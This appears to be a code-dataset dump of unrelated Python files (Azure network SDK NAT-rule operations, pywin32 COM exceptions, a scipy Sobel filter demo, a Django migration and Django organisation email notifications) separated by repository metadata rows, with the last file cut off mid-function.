        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-02-01"
        accept = "application/json"

        # Construct URL
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
            'natRuleName': self._serialize.url("nat_rule_name", nat_rule_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # 200 is the only documented success code for this GET.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('VirtualNetworkGatewayNatRule', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules/{natRuleName}'}  # type: ignore

    def _create_or_update_initial(
        self,
        resource_group_name,  # type: str
        virtual_network_gateway_name,  # type: str
        nat_rule_name,  # type: str
        nat_rule_parameters,  # type: "_models.VirtualNetworkGatewayNatRule"
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.VirtualNetworkGatewayNatRule"
        # Initial PUT of the long-running create/update operation;
        # 200 = existing rule updated, 201 = new rule created.
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VirtualNetworkGatewayNatRule"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-02-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self._create_or_update_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
            'natRuleName': self._serialize.url("nat_rule_name", nat_rule_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(nat_rule_parameters, 'VirtualNetworkGatewayNatRule')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        if response.status_code == 200:
            deserialized = self._deserialize('VirtualNetworkGatewayNatRule', pipeline_response)

        if response.status_code == 201:
            deserialized = self._deserialize('VirtualNetworkGatewayNatRule', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules/{natRuleName}'}  # type: ignore

    def begin_create_or_update(
        self,
        resource_group_name,  # type: str
        virtual_network_gateway_name,  # type: str
        nat_rule_name,  # type: str
        nat_rule_parameters,  # type: "_models.VirtualNetworkGatewayNatRule"
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller["_models.VirtualNetworkGatewayNatRule"]
        """Creates a nat rule to a scalable virtual network gateway if it doesn't exist else updates the
        existing nat rules.

        :param resource_group_name: The resource group name of the Virtual Network Gateway.
        :type resource_group_name: str
        :param virtual_network_gateway_name: The name of the gateway.
        :type virtual_network_gateway_name: str
        :param nat_rule_name: The name of the nat rule.
        :type nat_rule_name: str
        :param nat_rule_parameters: Parameters supplied to create or Update a Nat Rule.
        :type nat_rule_parameters: ~azure.mgmt.network.v2021_02_01.models.VirtualNetworkGatewayNatRule
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling.
         Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either VirtualNetworkGatewayNatRule or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2021_02_01.models.VirtualNetworkGatewayNatRule]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VirtualNetworkGatewayNatRule"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Without a continuation token, kick off the LRO with the initial PUT.
        if cont_token is None:
            raw_result = self._create_or_update_initial(
                resource_group_name=resource_group_name,
                virtual_network_gateway_name=virtual_network_gateway_name,
                nat_rule_name=nat_rule_name,
                nat_rule_parameters=nat_rule_parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )

        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)

        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('VirtualNetworkGatewayNatRule', pipeline_response)

            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized

        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
            'natRuleName': self._serialize.url("nat_rule_name", nat_rule_name, 'str'),
        }

        # Create/update LROs report their final state via the Azure-AsyncOperation header.
        if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules/{natRuleName}'}  # type: ignore

    def _delete_initial(
        self,
        resource_group_name,  # type: str
        virtual_network_gateway_name,  # type: str
        nat_rule_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> None
        # Initial DELETE of the long-running delete operation;
        # 200/202/204 all indicate the request was accepted.
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-02-01"
        accept = "application/json"

        # Construct URL
        url = self._delete_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
            'natRuleName': self._serialize.url("nat_rule_name", nat_rule_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules/{natRuleName}'}  # type: ignore

    def begin_delete(
        self,
        resource_group_name,  # type: str
        virtual_network_gateway_name,  # type: str
        nat_rule_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller[None]
        """Deletes a nat rule.

        :param resource_group_name: The resource group name of the Virtual Network Gateway.
        :type resource_group_name: str
        :param virtual_network_gateway_name: The name of the gateway.
        :type virtual_network_gateway_name: str
        :param nat_rule_name: The name of the nat rule.
        :type nat_rule_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling.
         Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[None]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Without a continuation token, kick off the LRO with the initial DELETE.
        if cont_token is None:
            raw_result = self._delete_initial(
                resource_group_name=resource_group_name,
                virtual_network_gateway_name=virtual_network_gateway_name,
                nat_rule_name=nat_rule_name,
                cls=lambda x,y,z: x,
                **kwargs
            )

        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)

        def get_long_running_output(pipeline_response):
            if cls:
                return cls(pipeline_response, None, {})

        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
            'natRuleName': self._serialize.url("nat_rule_name", nat_rule_name, 'str'),
        }

        # Delete LROs report their final state via the Location header.
        if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules/{natRuleName}'}  # type: ignore

    def list_by_virtual_network_gateway(
        self,
        resource_group_name,  # type: str
        virtual_network_gateway_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["_models.ListVirtualNetworkGatewayNatRulesResult"]
        """Retrieves all nat rules for a particular virtual network gateway.

        :param resource_group_name: The resource group name of the virtual network gateway.
        :type resource_group_name: str
        :param virtual_network_gateway_name: The name of the gateway.
        :type virtual_network_gateway_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ListVirtualNetworkGatewayNatRulesResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2021_02_01.models.ListVirtualNetworkGatewayNatRulesResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # Server-driven paging: ItemPaged follows the service's nextLink until exhausted.
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ListVirtualNetworkGatewayNatRulesResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-02-01"
        accept = "application/json"

        def prepare_request(next_link=None):
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list_by_virtual_network_gateway.metadata['url']  # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # Subsequent pages: the nextLink is a fully-formed URL.
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        def extract_data(pipeline_response):
            deserialized = self._deserialize('ListVirtualNetworkGatewayNatRulesResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return ItemPaged(
            get_next, extract_data
        )
    list_by_virtual_network_gateway.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules'}  # type: ignore
| [
"[email protected]"
] | |
1525fa01ca88e86a1491f6968ca7daf25bda962c | c086a38a366b0724d7339ae94d6bfb489413d2f4 | /PythonEnv/Lib/site-packages/win32com/server/exception.py | f84cccdf5e349025e91ae2f9bdf4e87a0bb9e8d9 | [] | no_license | FlowkoHinti/Dionysos | 2dc06651a4fc9b4c8c90d264b2f820f34d736650 | d9f8fbf3bb0713527dc33383a7f3e135b2041638 | refs/heads/master | 2021-03-02T01:14:18.622703 | 2020-06-09T08:28:44 | 2020-06-09T08:28:44 | 245,826,041 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,452 | py | """Exception Handling
Exceptions
To better support COM exceptions, the framework allows for an instance to be
raised. This instance may have a certain number of known attributes, which are
translated into COM exception details.
This means, for example, that Python could raise a COM exception that includes details
on a Help file and location, and a description for the user.
This module provides a class which provides the necessary attributes.
"""
import sys, pythoncom
# Note that we derive from com_error, which derives from exceptions.Exception
# Also note that we dont support "self.args", as we dont support tuple-unpacking
class COMException(pythoncom.com_error):
    """An Exception object that is understood by the framework.

    If the framework is presented with an exception of type class,
    it looks for certain known attributes on this class to provide rich
    error information to the caller.

    It should be noted that the framework supports providing this error
    information via COM Exceptions, or via the ISupportErrorInfo interface.

    By using this class, you automatically provide rich error information to the
    server.
    """

    def __init__(self, description=None, scode=None,
                 source=None, helpfile=None, helpContext=None,
                 desc=None, hresult=None):
        """Initialize an exception

        **Params**

        description -- A string description for the exception.
        scode -- An integer scode to be returned to the server, if necessary.
        The pythoncom framework defaults this to be DISP_E_EXCEPTION if not specified otherwise.
        source -- A string which identifies the source of the error.
        helpfile -- A string which points to a help file which contains details on the error.
        helpContext -- An integer context in the help file.
        desc -- A short-cut for description.
        hresult -- A short-cut for scode.
        """
        # convert a WIN32 error into an HRESULT
        # "scode" wins over its "hresult" alias when both are given.
        scode = scode or hresult
        if scode and scode != 1:  # We dont want S_FALSE mapped!
            if scode >= -32768 and scode < 32768:
                # this is HRESULT_FROM_WIN32()
                # (0x80070000 | code, expressed as a signed 32-bit int)
                scode = -2147024896 | (scode & 0x0000FFFF)
        self.scode = scode
        # "desc" is accepted as a short-cut spelling of "description".
        self.description = description or desc
        if scode == 1 and not self.description:
            # scode 1 is S_FALSE: give it a symbolic name rather than a lookup.
            self.description = "S_FALSE"
        elif scode and not self.description:
            self.description = pythoncom.GetScodeString(scode)

        self.source = source
        self.helpfile = helpfile
        self.helpcontext = helpContext

        # todo - fill in the exception value
        pythoncom.com_error.__init__(self, scode, self.description, None, -1)

    def __repr__(self):
        return "<COM Exception - scode=%s, desc=%s>" % (self.scode, self.description)
# Old name for the COMException class.
# Do NOT use the name Exception, as it is now a built-in
# COMException is the new, official name.
# Deprecated alias kept only for backward compatibility with older callers.
Exception = COMException
def IsCOMException(t=None):
    """Return true if *t* (default: the active exception type) is a COM error.

    Falls back to an identity comparison for legacy non-class exception
    types, where issubclass raises TypeError.
    """
    if t is None:
        t = sys.exc_info()[0]
    try:
        return issubclass(t, pythoncom.com_error)
    except TypeError:  # 1.5 in -X mode?
        # BUGFIX: was "pythoncon.com_error" - a typo that raised NameError
        # whenever this legacy fallback path was taken.
        return t is pythoncom.com_error
def IsCOMServerException(t=None):
    """Return true if *t* (default: the active exception type) derives from COMException."""
    exc_type = sys.exc_info()[0] if t is None else t
    try:
        return issubclass(exc_type, COMException)
    except TypeError:  # not a class (e.g. a legacy string exception)
        return 0
| [
"="
] | = |
f1de4f284f6ae6dcbf0e216dae4bd4020b7fe948 | cd5746f8cc7aee1f20606a65b4fae0d5e8ee78dc | /Python Books/Mastering-Machine-Learning-scikit-learn/NumPy-Cookbook/NumPy Cookbook 2nd Edition_CodeBundle/Final Code/0945OS_05_Final Code/ch5code/sobel.py | 7a60c93500bba9e0a6d9825f564f9b66bfa7ba43 | [] | no_license | theGreenJedi/Path | df24fca355590efef0c6cb5c52e7216c6b5d2464 | b5ed2805dbb046480929e49e550bfd8af5bb4d6f | refs/heads/master | 2023-07-27T14:23:37.694546 | 2021-07-16T01:38:55 | 2021-07-16T01:38:55 | 87,686,563 | 8 | 2 | null | 2023-07-11T22:49:03 | 2017-04-09T05:57:30 | Jupyter Notebook | UTF-8 | Python | false | false | 623 | py | import scipy
import scipy.misc  # BUGFIX: lena() lives in scipy.misc; "import scipy" alone does not load it
import scipy.ndimage
import matplotlib.pyplot as plt

# Load the classic "Lena" grayscale test image.
lena = scipy.misc.lena()
plt.subplot(221)
plt.imshow(lena)
plt.title('Original')
plt.axis('off')

# Sobel X filter: gradient along axis 0, zero-padded borders.
sobelx = scipy.ndimage.sobel(lena, axis=0, mode='constant')
plt.subplot(222)
plt.imshow(sobelx)
plt.title('Sobel X')
plt.axis('off')

# Sobel Y filter: gradient along axis 1, zero-padded borders.
sobely = scipy.ndimage.sobel(lena, axis=1, mode='constant')
plt.subplot(223)
plt.imshow(sobely)
plt.title('Sobel Y')
plt.axis('off')

# Default Sobel filter (library defaults for axis and border mode).
default = scipy.ndimage.sobel(lena)
plt.subplot(224)
plt.imshow(default)
plt.title('Default Filter')
plt.axis('off')
plt.show()
| [
"[email protected]"
] | |
3f2079b1e4c24c815959e7a54257986eb1c35628 | 82199bfad7b77d62aa265c8ea463e20df6901801 | /global_variables.py | 0349063285f925772377b500255d2fdee5a359ce | [] | no_license | hyzcn/interactive-behaviour-design | 6119f8685b91226916f06678735fcfea5e6c27ab | 26faa63f0d1494dedd7dd9c3757ab08ec6473119 | refs/heads/master | 2020-05-16T09:04:42.342957 | 2019-04-22T19:26:27 | 2019-04-22T19:38:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | # ALE is generally safe to use from multiple threads, but we do need to be careful about
# two threads creating environments at the same time:
# https://github.com/mgbellemare/Arcade-Learning-Environment/issues/86
# Any thread which creates environments (which includes restoring from a reset state)
# should acquire this lock before attempting the creation.
# Set at startup by the application; guards environment creation (see note above).
env_creation_lock = None
# Set at startup; how recorded segments are saved.  TODO confirm valid values at the assignment site.
segment_save_mode = None
max_segs = None | [
"[email protected]"
] | |
9b43ee53672fb7b8aa059524c4d04d2b92fd2289 | 689a557b32161faafeb0b68076bca96b65c320ce | /restourant/migrations/0003_auto_20170726_1525.py | 3156e7bad15655147d6acc6853903542146c11b9 | [] | no_license | FNSalimov/new | 5d957a5e2543bcecece2fa88e4ff61030eb58203 | e2b15e5e83dbc22d776112fc5859219d7f625e4f | refs/heads/master | 2021-01-01T18:36:54.171096 | 2017-07-27T06:27:24 | 2017-07-27T06:27:24 | 98,386,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 740 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2017-07-26 12:25
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Replaces the explicit OrderDish through-model with a plain
    # ManyToMany field Order.dishes: drops both FK columns, adds the
    # M2M relation, then deletes the now-empty OrderDish model.
    # NOTE(review): existing OrderDish rows are not migrated into the new
    # M2M table by this migration.

    dependencies = [
        ('restourant', '0002_order_orderdish'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='orderdish',
            name='dish',
        ),
        migrations.RemoveField(
            model_name='orderdish',
            name='order',
        ),
        migrations.AddField(
            model_name='order',
            name='dishes',
            field=models.ManyToManyField(to='restourant.Dish'),
        ),
        migrations.DeleteModel(
            name='OrderDish',
        ),
    ]
| [
"[email protected]"
] | |
8519508e4603dd2e130c752354be03bd1e5116b5 | 6cb32cc2ee3ced7ea1a710283633d2cd76c42232 | /commercialoperator/components/organisations/emails.py | cc8911455d416c0462204f47e0455ba75fcf812b | [
"Apache-2.0"
] | permissive | dbca-wa/commercialoperator | 913889973066a5e8bd399835cfbaf948af4ea596 | e29306b1c6213f0f37a6a190e439745965ee3e32 | refs/heads/master | 2023-08-31T01:19:06.803451 | 2023-07-28T01:40:38 | 2023-07-28T01:40:38 | 239,469,350 | 0 | 10 | NOASSERTION | 2023-09-07T07:25:58 | 2020-02-10T09:07:54 | Python | UTF-8 | Python | false | false | 16,300 | py | import logging
from django.core.mail import EmailMultiAlternatives, EmailMessage
from django.utils.encoding import smart_text
from django.core.urlresolvers import reverse
from django.conf import settings
from commercialoperator.components.emails.emails import TemplateEmailBase
# Module-level logger, named after this module's import path.
logger = logging.getLogger(__name__)
# Sender display name stamped on automated organisation emails.
SYSTEM_NAME = settings.SYSTEM_NAME_SHORT + ' Automated Message'
class OrganisationRequestAcceptNotificationEmail(TemplateEmailBase):
    """Notifies the requester that their organisation request was accepted."""
    subject = 'Your organisation request has been accepted.'
    html_template = 'commercialoperator/emails/organisation_request_accept_notification.html'
    txt_template = 'commercialoperator/emails/organisation_request_accept_notification.txt'
class OrganisationAccessGroupRequestAcceptNotificationEmail(TemplateEmailBase):
    """Notifies the organisation access group that a new request was submitted.

    NOTE(review): the class name says "accept" but the subject/templates
    describe a new-submission notice -- confirm the intended event.
    """
    subject = 'New organisation request has been submitted.'
    html_template = 'commercialoperator/emails/org_access_group_request_accept_notification.html'
    txt_template = 'commercialoperator/emails/org_access_group_request_accept_notification.txt'
class OrganisationRequestNotificationEmail(TemplateEmailBase):
subject = 'An organisation request has been submitted for approval'
html_template = 'commercialoperator/emails/organisation_request_notification.html'
txt_template = 'commercialoperator/emails/organisation_request_notification.txt'
class OrganisationRequestDeclineNotificationEmail(TemplateEmailBase):
subject = 'Your organisation request has been declined.'
html_template = 'commercialoperator/emails/organisation_request_decline_notification.html'
txt_template = 'commercialoperator/emails/organisation_request_decline_notification.txt'
class OrganisationLinkNotificationEmail(TemplateEmailBase):
subject = '{} - Confirmation - Account linked.'.format(settings.DEP_NAME)
html_template = 'commercialoperator/emails/organisation_link_notification.html'
txt_template = 'commercialoperator/emails/organisation_link_notification.txt'
class OrganisationUnlinkNotificationEmail(TemplateEmailBase):
subject = 'You have been unlinked from an organisation.'
html_template = 'commercialoperator/emails/organisation_unlink_notification.html'
txt_template = 'commercialoperator/emails/organisation_unlink_notification.txt'
class OrganisationContactAdminUserNotificationEmail(TemplateEmailBase):
subject = 'You have been linked as Company Admin Role.'
html_template = 'commercialoperator/emails/organisation_contact_admin_notification.html'
txt_template = 'commercialoperator/emails/organisation_contact_admin_notification.txt'
class OrganisationContactUserNotificationEmail(TemplateEmailBase):
subject = 'You have been linked as Company User Role.'
html_template = 'commercialoperator/emails/organisation_contact_user_notification.html'
txt_template = 'commercialoperator/emails/organisation_contact_user_notification.txt'
class OrganisationContactSuspendNotificationEmail(TemplateEmailBase):
subject = 'You have been suspended as Company User.'
html_template = 'commercialoperator/emails/organisation_contact_suspend_notification.html'
txt_template = 'commercialoperator/emails/organisation_contact_suspend_notification.txt'
class OrganisationContactReinstateNotificationEmail(TemplateEmailBase):
subject = 'You have been Reinstated as Company User.'
html_template = 'commercialoperator/emails/organisation_contact_reinstate_notification.html'
txt_template = 'commercialoperator/emails/organisation_contact_reinstate_notification.txt'
class OrganisationContactDeclineNotificationEmail(TemplateEmailBase):
subject = 'Your organisation link request has been declined.'
html_template = 'commercialoperator/emails/organisation_contact_decline_notification.html'
txt_template = 'commercialoperator/emails/organisation_contact_decline_notification.txt'
class OrganisationAddressUpdatedNotificationEmail(TemplateEmailBase):
    """Notifies organisation admins that the organisation's address changed."""
    # FIX: the original used adjacent single-quoted literals
    # ('An organisation''s address ...'), which Python concatenates into
    # "An organisations address ..." — losing the intended apostrophe.
    subject = "An organisation's address has been updated"
    html_template = 'commercialoperator/emails/organisation_address_updated_notification.html'
    txt_template = 'commercialoperator/emails/organisation_address_updated_notification.txt'
class OrganisationIdUploadNotificationEmail(TemplateEmailBase):
    """Notifies recipients that an organisation's identification was uploaded."""
    # FIX: the original used adjacent single-quoted literals
    # ('An organisation''s identification ...'), which concatenate into
    # "An organisations identification ..." — losing the intended apostrophe.
    subject = "An organisation's identification has been uploaded"
    html_template = 'commercialoperator/emails/organisation_id_upload_notification.html'
    txt_template = 'commercialoperator/emails/organisation_id_upload_notification.txt'
class OrganisationRequestLinkNotificationEmail(TemplateEmailBase):
    """Notifies approvers that an organisation link request awaits approval."""
    subject = 'An organisation request to be linked has been sent for approval'
    html_template = 'commercialoperator/emails/organisation_request_link_notification.html'
    txt_template = 'commercialoperator/emails/organisation_request_link_notification.txt'
def send_organisation_id_upload_email_notification(emails, organisation, org_contact, request):
    """Notify *emails* that identification was uploaded for *organisation*.

    The sent message is logged against the organisation and *org_contact*.
    """
    template = OrganisationIdUploadNotificationEmail()
    message = template.send(emails, context={'organisation': organisation})
    # Attribute the email to the acting user, falling back to the system sender.
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    _log_org_email(message, organisation, org_contact, sender=acting_user)
def send_organisation_request_link_email_notification(
        org_request, request, contact):
    """Ask *contact* to approve linking for the given organisation request."""
    template = OrganisationRequestLinkNotificationEmail()
    manage_url = request.build_absolute_uri(
        '/external/organisations/manage/{}'.format(org_request.id))
    message = template.send(contact, context={'request': org_request, 'url': manage_url})
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    # NOTE(review): the org_request is passed where _log_org_email expects an
    # organisation — preserved from the original call.
    _log_org_email(message, org_request, request.user, sender=acting_user)
def send_organisation_reinstate_email_notification(linked_user, linked_by, organisation, request):
    """Email *linked_user* that *linked_by* reinstated them in *organisation*."""
    template = OrganisationContactReinstateNotificationEmail()
    context = {
        'user': linked_user,
        'linked_by': linked_by,
        'organisation': organisation,
    }
    # CC the organisation's own mailbox when one is configured.
    carbon_copies = [organisation.email] if organisation.email else []
    message = template.send(linked_user.email, cc=carbon_copies, context=context)
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    _log_org_email(message, organisation, linked_user, sender=acting_user)
def send_organisation_contact_suspend_email_notification(linked_user, linked_by, organisation, request):
    """Email *linked_user* that *linked_by* suspended them in *organisation*."""
    template = OrganisationContactSuspendNotificationEmail()
    context = {
        'user': linked_user,
        'linked_by': linked_by,
        'organisation': organisation,
    }
    # CC the organisation's own mailbox when one is configured.
    carbon_copies = [organisation.email] if organisation.email else []
    message = template.send(linked_user.email, cc=carbon_copies, context=context)
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    _log_org_email(message, organisation, linked_user, sender=acting_user)
def send_organisation_contact_decline_email_notification(user_contact, deleted_by, organisation, request):
    """Email *user_contact* that *deleted_by* declined their link request."""
    template = OrganisationContactDeclineNotificationEmail()
    context = {
        'user': user_contact,
        'linked_by': deleted_by,
        'organisation': organisation,
    }
    # CC the organisation's own mailbox when one is configured.
    carbon_copies = [organisation.email] if organisation.email else []
    message = template.send(user_contact.email, cc=carbon_copies, context=context)
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    _log_org_email(message, organisation, user_contact, sender=acting_user)
def send_organisation_contact_user_email_notification(linked_user, linked_by, organisation, request):
    """Email *linked_user* that they were given the Company User role."""
    template = OrganisationContactUserNotificationEmail()
    context = {
        'user': linked_user,
        'linked_by': linked_by,
        'organisation': organisation,
    }
